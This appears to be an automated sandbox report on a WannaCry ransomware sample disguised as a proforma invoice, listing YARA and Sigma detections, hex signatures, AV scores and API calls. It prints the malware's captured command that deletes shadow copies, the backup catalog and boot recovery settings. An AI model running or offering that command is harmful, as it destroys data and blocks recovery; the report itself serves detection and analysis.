C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\@WanaDecryptor@.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    Click to see the 18 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        Process Memory Space: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 3796JoeSecurity_Conti_ransomwareYara detected Conti ransomwareJoe Security
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpackWanaCryWanaCry Payloadkevoreilly
          • 0xd5c4:$exename: @WanaDecryptor@.exe
          • 0xd60c:$exename: @WanaDecryptor@.exe
          • 0xd8c0:$res: %08X.res
          • 0xd8b4:$pky: %08X.pky
          • 0xd8a8:$eky: %08X.eky
          • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
          10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpackWanaCryWanaCry Payloadkevoreilly
          • 0xd5c4:$exename: @WanaDecryptor@.exe
          • 0xd60c:$exename: @WanaDecryptor@.exe
          • 0xd8c0:$res: %08X.res
          • 0xd8b4:$pky: %08X.pky
          • 0xd8a8:$eky: %08X.eky
          • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
          59.0.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            59.0.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
            • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
            • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
            • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
            10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpackWanaCryWanaCry Payloadkevoreilly
            • 0xd5c4:$exename: @WanaDecryptor@.exe
            • 0xd60c:$exename: @WanaDecryptor@.exe
            • 0xd8c0:$res: %08X.res
            • 0xd8b4:$pky: %08X.pky
            • 0xd8a8:$eky: %08X.eky
            • 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
            Click to see the 4 entries

            Sigma Signatures

            Operating System Destruction

            barindex
            Sigma detected: Delete shadow copy via WMIC
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 6196, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 5720, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnkAvira: detection malicious, Label: LNK/Runner.VPDJ
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeVirustotal: Detection: 89%Perma Link
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeReversingLabs: Detection: 92%
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeVirustotal: Detection: 94%Perma Link
            Source: C:\Users\user\Desktop\taskdl.exeReversingLabs: Detection: 89%
            Source: C:\Users\user\Desktop\taskdl.exeVirustotal: Detection: 88%Perma Link
            Source: C:\Users\user\Desktop\taskse.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\Desktop\taskse.exeVirustotal: Detection: 88%Perma Link
            Source: C:\Users\user\Desktop\u.wnryReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\u.wnryVirustotal: Detection: 89%Perma Link
            Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 96%
            Source: C:\Users\user\Documents\@WanaDecryptor@.exeVirustotal: Detection: 89%Perma Link
            Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 96%
            Source: C:\Users\user\Downloads\@WanaDecryptor@.exeVirustotal: Detection: 89%Perma Link
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,10_2_10003F00
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003C00 CryptDestroyKey,10_2_10003C00
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,10_2_10004040
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004350 CryptGenKey,10_2_10004350
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,10_2_10004170
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,10_2_10004370
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,10_2_10003A80
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,10_2_10003BB0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,10_2_10003AC0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,10_2_10003D10
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004420 CryptGenRandom,10_2_10004420
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,10_2_10004440
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDCC0 SSL_get1_session,CRYPTO_lock,CRYPTO_lock,86_2_6CDCDCC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBCF0 CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,sk_pop_free,__stack_chk_fail,X509_chain_up_ref,sk_pop_free,sk_pop_free,sk_pop_free,__stack_chk_fail,sk_push,sk_new_null,__stack_chk_fail,sk_push,CRYPTO_add_lock,sk_new_null,__stack_chk_fail,X509_cmp,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CDCBCF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6964 sk_zero,CRYPTO_free,BUF_memdup,sk_push,ERR_put_error,sk_new_null,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,sk_free,86_2_6CDC6964
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDBCF0 SSL_CONF_cmd,strlen,strncmp,strcmp,_stricmp,_strnicmp,ERR_put_error,ERR_put_error,ERR_add_error_data,ERR_put_error,ERR_add_error_data,__stack_chk_fail,SSL_CONF_cmd_argv,SSL_CONF_cmd,SSL_CONF_cmd,SSL_CONF_cmd,__stack_chk_fail,SSL_CONF_cmd_value_type,strlen,strncmp,strcmp,_stricmp,_strnicmp,__stack_chk_fail,SSL_CONF_CTX_new,CRYPTO_malloc,__stack_chk_fail,86_2_6CDDBCF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9CF0 d2i_ASN1_OCTET_STRING,CRYPTO_free,CRYPTO_free,86_2_6CDD9CF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7CE9 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA7CE9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDC90 SSL_get_session,__stack_chk_fail,SSL_get1_session,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,SSL_SESSION_get_ex_new_index,CRYPTO_get_ex_new_index,__stack_chk_fail,SSL_SESSION_set_ex_data,__stack_chk_fail,SSL_SESSION_get_ex_data,__stack_chk_fail,CRYPTO_set_ex_data,CRYPTO_get_ex_data,86_2_6CDCDC90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2C83 EVP_MD_CTX_destroy,CRYPTO_free,CRYPTO_malloc,BIO_ctrl,EVP_MD_CTX_create,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,BIO_free,ERR_put_error,86_2_6CDA2C83
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7C80 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,CRYPTO_lock,__stack_chk_fail,86_2_6CDA7C80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FC87 CRYPTO_free,CRYPTO_malloc,86_2_6CD9FC87
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACB40 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDACB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC8CB0 CRYPTO_add_lock,time,SSL_SESSION_free,SSL_CTX_add_session,__stack_chk_fail,SSL_CTX_get_ssl_method,__stack_chk_fail,SSL_get_ssl_method,__stack_chk_fail,86_2_6CDC8CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDACCB7 CRYPTO_free,86_2_6CDACCB7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4CA0 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,RSA_flags,EVP_PKEY_free,ERR_clear_error,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,86_2_6CDD4CA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCCA5 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBCCA5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDC52 CRYPTO_add_lock,86_2_6CDCDC52
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD98B20 ERR_put_error,sk_new_null,sk_push,d2i_X509,ERR_put_error,ERR_put_error,ERR_clear_error,sk_value,X509_get_pubkey,X509_free,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_missing_parameters,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_add_lock,X509_free,X509_free,CRYPTO_add_lock,__stack_chk_fail,86_2_6CD98B20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2C60 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDA2C60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C09 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,strlen,strlen,SSL_get_srtp_profiles,strncmp,CRYPTO_malloc,strlen,ERR_put_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,sk_pop_free,sk_new_null,sk_push,d2i_OCSP_RESPID,sk_pop_free,d2i_X509_EXTENSIONS,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,OCSP_RESPID_free,OCSP_RESPID_free,86_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6964 sk_zero,CRYPTO_free,BUF_memdup,sk_push,ERR_put_error,sk_new_null,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,sk_free,86_2_6CDC6964
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7C00 SSL_CTX_use_serverinfo_file,BIO_s_file,BIO_new,BIO_ctrl,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,strlen,strncmp,CRYPTO_realloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_CTX_use_serverinfo,__stack_chk_fail,86_2_6CDD7C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDC39 CRYPTO_add_lock,86_2_6CDCDC39
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCADD0 OBJ_bsearch_,__stack_chk_fail,SSL_load_error_strings,ERR_load_crypto_strings,__stack_chk_fail,__stack_chk_fail,86_2_6CDCADD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBCF0 CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,sk_pop_free,__stack_chk_fail,X509_chain_up_ref,sk_pop_free,sk_pop_free,sk_pop_free,__stack_chk_fail,sk_push,sk_new_null,__stack_chk_fail,sk_push,CRYPTO_add_lock,sk_new_null,__stack_chk_fail,X509_cmp,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CDCBCF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAFDC7 CRYPTO_malloc,86_2_6CDAFDC7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB5DE9 CRYPTO_malloc,ERR_put_error,86_2_6CDB5DE9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCCD90 SSL_add_file_cert_subjects_to_stack,sk_set_cmp_func,BIO_s_file,BIO_new,BIO_ctrl,BIO_free,sk_set_cmp_func,PEM_read_bio_X509,X509_get_subject_name,ERR_put_error,ERR_clear_error,__stack_chk_fail,SSL_add_dir_cert_subjects_to_stack,CRYPTO_lock,strlen,strlen,BIO_snprintf,SSL_add_file_cert_subjects_to_stack,OPENSSL_DIR_read,OPENSSL_DIR_end,CRYPTO_lock,ERR_put_error,__stack_chk_fail,86_2_6CDCCD90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4DB5 X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,RSA_flags,86_2_6CDD4DB5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDDB0 SSL_SESSION_set_ex_data,CRYPTO_set_ex_data,86_2_6CDCDDB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCFDB0 SSL_set_session_ticket_ext,CRYPTO_free,CRYPTO_malloc,86_2_6CDCFDB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD5DB0 SSL_use_PrivateKey,X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,ERR_put_error,X509_check_private_key,ERR_put_error,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,86_2_6CDD5DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FDA9 __stack_chk_fail,X509_STORE_free,CRYPTO_add_lock,86_2_6CD9FDA9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDD50 SSL_SESSION_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CDCDD50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0D55 CRYPTO_free,CRYPTO_free,memcmp,memcmp,memcmp,86_2_6CDB0D55
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCED4C SSL_CTX_ctrl,SSL_CTX_ctrl,lh_retrieve,CRYPTO_lock,lh_delete,CRYPTO_add_lock,86_2_6CDCED4C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDDD40 SSL_SRP_CTX_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,__stack_chk_fail,SSL_SRP_CTX_init,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BUF_strdup,ERR_put_error,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,ERR_put_error,86_2_6CDDDD40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCD6C pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBCD6C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3D62 CRYPTO_malloc,RAND_bytes,CRYPTO_free,86_2_6CDB3D62
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD67 __stack_chk_fail,X509_STORE_free,CRYPTO_add_lock,86_2_6CD9FD67
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA5070 ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,COMP_expand_block,ERR_put_error,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDA5070
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBFD17 CRYPTO_malloc,CRYPTO_malloc,86_2_6CDBFD17
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBD39 CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,86_2_6CDCBD39
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCED39 CRYPTO_lock,86_2_6CDCED39
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD2C __stack_chk_fail,X509_STORE_CTX_init,ERR_put_error,X509_STORE_free,X509_STORE_CTX_set_flags,X509_verify_cert,X509_STORE_CTX_get1_chain,X509_STORE_CTX_cleanup,sk_pop_free,sk_shift,X509_free,X509_STORE_new,sk_num,sk_value,X509_STORE_add_cert,sk_num,X509_STORE_add_cert,ERR_peek_last_error,ERR_clear_error,sk_num,sk_num,sk_value,X509_check_purpose,sk_pop,X509_free,ERR_put_error,X509_STORE_CTX_get_error,X509_verify_cert_error_string,ERR_add_error_data,X509_STORE_CTX_cleanup,ERR_put_error,ERR_clear_error,ERR_peek_last_error,ERR_clear_error,__stack_chk_fail,X509_STORE_free,CRYPTO_add_lock,__stack_chk_fail,RAND_bytes,SSL_has_matching_session_id,__stack_chk_fail,86_2_6CD9FD2C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD8ED7 d2i_ASN1_INTEGER,CRYPTO_free,d2i_ASN1_INTEGER,ASN1_INTEGER_get,CRYPTO_free,d2i_ASN1_OCTET_STRING,86_2_6CDD8ED7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD93EF0 RAND_bytes,RSA_private_decrypt,ERR_clear_error,OPENSSL_cleanse,ERR_put_error,ERR_put_error,OPENSSL_cleanse,EVP_PKEY_CTX_new,EVP_PKEY_decrypt_init,X509_get_pubkey,EVP_PKEY_derive_set_peer,ASN1_get_object,ERR_put_error,EVP_PKEY_free,EVP_PKEY_CTX_free,EVP_PKEY_free,EC_POINT_free,BN_CTX_free,X509_get_pubkey,EVP_PKEY_cmp_parameters,ERR_put_error,BN_bin2bn,DH_compute_key,DH_free,DH_free,OPENSSL_cleanse,BN_bin2bn,BN_ucmp,CRYPTO_free,BUF_strdup,SRP_generate_server_master_secret,OPENSSL_cleanse,ERR_put_error,EVP_PKEY_get1_DH,EVP_PKEY_free,EC_KEY_new,EC_KEY_get0_group,EC_KEY_get0_private_key,EC_KEY_set_group,EC_KEY_set_private_key,EC_POINT_new,X509_get_pubkey,EC_KEY_get0_public_key,EC_POINT_copy,EC_GROUP_get_degree,ECDH_compute_key,EVP_PKEY_free,EC_POINT_free,EC_KEY_free,BN_CTX_free,EC_KEY_free,OPENSSL_cleanse,BN_clear_free,OPENSSL_cleanse,ERR_put_error,ERR_put_error,BN_CTX_new,EC_POINT_oct2point,ERR_put_error,memmove,CRYPTO_free,BUF_strndup,CRYPTO_free,BUF_strdup,OPENSSL_cleanse,ERR_put_error,EVP_PKEY_free,EC_POINT_free,EC_KEY_free,ERR_put_error,ERR_put_error,EVP_PKEY_decrypt,OPENSSL_cleanse,EVP_PKEY_CTX_ctrl,EVP_PKEY_free,EVP_PKEY_CTX_free,ERR_put_error,ERR_put_error,BN_clear_free,ERR_put_error,ERR_put_error,ERR_clear_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CD93EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCFEF0 SSL_CTX_flush_sessions,CRYPTO_lock,lh_doall_arg,CRYPTO_lock,__stack_chk_fail,86_2_6CDCFEF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9E80 SSL_CTX_get_quiet_shutdown,__stack_chk_fail,SSL_set_quiet_shutdown,__stack_chk_fail,SSL_get_quiet_shutdown,__stack_chk_fail,SSL_set_shutdown,__stack_chk_fail,SSL_get_shutdown,__stack_chk_fail,SSL_version,__stack_chk_fail,SSL_get_SSL_CTX,__stack_chk_fail,SSL_set_SSL_CTX,CRYPTO_add_lock,CRYPTO_add_lock,OpenSSLDie,memcmp,__stack_chk_fail,SSL_CTX_set_default_verify_paths,__stack_chk_fail,SSL_CTX_load_verify_locations,__stack_chk_fail,X509_STORE_set_default_paths,X509_STORE_load_locations,86_2_6CDC9E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4EA0 X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDD4EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCCD90 SSL_add_file_cert_subjects_to_stack,sk_set_cmp_func,BIO_s_file,BIO_new,BIO_ctrl,BIO_free,sk_set_cmp_func,PEM_read_bio_X509,X509_get_subject_name,ERR_put_error,ERR_clear_error,__stack_chk_fail,SSL_add_dir_cert_subjects_to_stack,CRYPTO_lock,strlen,strlen,BIO_snprintf,SSL_add_file_cert_subjects_to_stack,OPENSSL_DIR_read,OPENSSL_DIR_end,CRYPTO_lock,ERR_put_error,__stack_chk_fail,86_2_6CDCCD90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDE40 SSL_SESSION_new,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCDE40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7E79 ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,86_2_6CDD7E79
